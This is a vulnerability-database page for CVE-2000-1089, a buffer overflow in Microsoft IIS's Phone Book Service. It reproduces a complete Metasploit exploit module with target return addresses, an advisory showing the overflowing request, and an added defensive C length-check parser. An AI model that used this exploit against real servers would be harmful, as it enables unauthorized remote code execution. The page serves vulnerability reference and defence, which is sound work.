CVE-2000-1089: Detail

CVE-2000-1089

96.78%V3
Network
2001-01-22 04:00 +00:00
2005-11-02 09:00 +00:00

CVE Description

Buffer overflow in Microsoft Phone Book Service allows local users to execute arbitrary commands, aka the "Phone Book Service Buffer Overflow" vulnerability.

CVE Information

Metrics

Metrics  Score  Severity  CVSS Vector                 Source
V2       10               AV:N/AC:L/Au:N/C:C/I:C/A:C  nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare one CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 16357

Publication date: 2010-04-29 22:00 +00:00
Author: Metasploit
EDB Verified: Yes

##
# $Id: ms00_094_pbserver.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS Phone Book Service Overflow',
      'Description'    => %q{
          This is an exploit for the Phone Book Service /pbserver/pbserver.dll
        described in MS00-094. By sending an overly long URL argument for
        phone book updates, it is possible to overwrite the stack.

        This module has only been tested against Windows 2000 SP1.
      },
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'CVE', '2000-1089' ],
          [ 'OSVDB', '463' ],
          [ 'BID', '2048' ],
          [ 'MSB', 'MS00-094' ],
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 896,
          'BadChars'        => "\x00\x0a\x0d\x20%&=?",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP1', { 'Ret' => 0x77e8898b }], # jmp esp kernel32.dll
          ['Windows 2000 SP0', { 'Ret' => 0x77ea162b }], # call esp kernel32.dll
          ['Windows NT SP6',   { 'Ret' => 0x77f32836 }], # jmp esp kernel32.dll
        ],
      'DisclosureDate' => 'Dec 04 2000',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]),
      ], self.class)
  end

  def check
    print_status("Requesting the vulnerable ISAPI path...")
    res = send_request_raw({
      'uri' => datastore['URL']
    }, 5)

    if (res and res.code == 400)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending overflow...")
    res = send_request_raw({
      'uri' => datastore['URL'] + '?&&&&&&pb=' + payload.encoded +
               [target['Ret']].pack('V') + make_nops(8) + Rex::Arch::X86.jmp(-912)
    }, 5)
    handler
  end

end
Exploit Database EDB-ID: 20460

Publication date: 2000-12-03 23:00 +00:00
Author: Alberto Solino
EDB Verified: Yes

source: https://www.securityfocus.com/bid/2048/info

The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. It is not installed by default.

A buffer overflow vulnerability was discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this vulnerability allows an attacker to execute arbitrary code and obtain a remote command shell with the privileges of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5).

The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/

According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used by making requests with the following format:

http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pbver=&pb=<STRING=db name>

The DLL checks the total length to ensure that the request does not exceed 1024 bytes; however, it is possible to overflow a local variable of fixed length in the DLL by sending a request with the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n

The result is an exception reported in the Event log with source WAM like the following:

The HTTP server encountered an unhandled exception while processing the ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B
For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.

By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.
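As an added defensive illustration (not code from the page, the advisory or the Metasploit module), the following C parser models the check mismatch the advisory describes: a request can pass the 1024-byte total-length check while one argument such as pb= still exceeds the fixed-size local buffer it is copied into. The hardened form enforces both limits and reports which one fails; the 256-byte local buffer and the helper names are assumptions for illustration, not values taken from PBSERVER.DLL.

```c
#include <string.h>

#define REQ_TOTAL_MAX 1024  /* total-length limit the advisory says the DLL enforced */

/* Result codes: which of the two checks (if any) rejected the request. */
enum pb_status { PB_OK = 0, PB_ERR_TOTAL_TOO_LONG, PB_ERR_FIELD_TOO_LONG, PB_ERR_MISSING };

/* Locate the "pb=" value in "osarch=&...&pbver=&pb=NAME". Arguments are '&'-separated
 * and empty ones ("&&&&&&") are skipped, as in the advisory's request. NULL if absent. */
static const char *find_pb_value(const char *query, size_t *value_len)
{
    for (const char *p = query; *p; p++) {
        if ((p == query || p[-1] == '&') && strncmp(p, "pb=", 3) == 0) {
            const char *v = p + 3, *end = strchr(v, '&');
            *value_len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
    }
    return NULL;
}

/* Copy pb= into out (capacity out_len) only if BOTH the total-length limit and the
 * per-field limit hold. Per the advisory, PBSERVER.DLL applied only the total check
 * before copying into a fixed-size local variable, which is the overflow. */
enum pb_status parse_pb_param(const char *query, char *out, size_t out_len)
{
    size_t vlen;
    const char *v;
    if (strlen(query) > REQ_TOTAL_MAX)
        return PB_ERR_TOTAL_TOO_LONG;
    if ((v = find_pb_value(query, &vlen)) == NULL)
        return PB_ERR_MISSING;
    if (vlen >= out_len)            /* keep room for the NUL terminator */
        return PB_ERR_FIELD_TOO_LONG;
    memcpy(out, v, vlen);
    out[vlen] = '\0';
    return PB_OK;
}

/* Constructed sample in the advisory's "&&&&&&pb=AAAA..." shape: a 900-byte value passes
 * the 1024-byte total check, so only the per-field check can reject it. */
enum pb_status check_overlong_sample(void)
{
    static char query[REQ_TOTAL_MAX + 1];
    char local[256];                /* assumed local buffer size, illustrative only */
    memset(query, 'A', 909);
    memcpy(query, "&&&&&&pb=", 9);
    query[909] = '\0';
    return parse_pb_param(query, local, sizeof local);
}
```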

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version 4.0

References

http://www.securityfocus.com/bid/2048
Tags: vdb-entry, x_refsource_BID
http://www.stake.com/research/advisories/2000/a120400-1.txt
Tags: vendor-advisory, x_refsource_ATSTAKE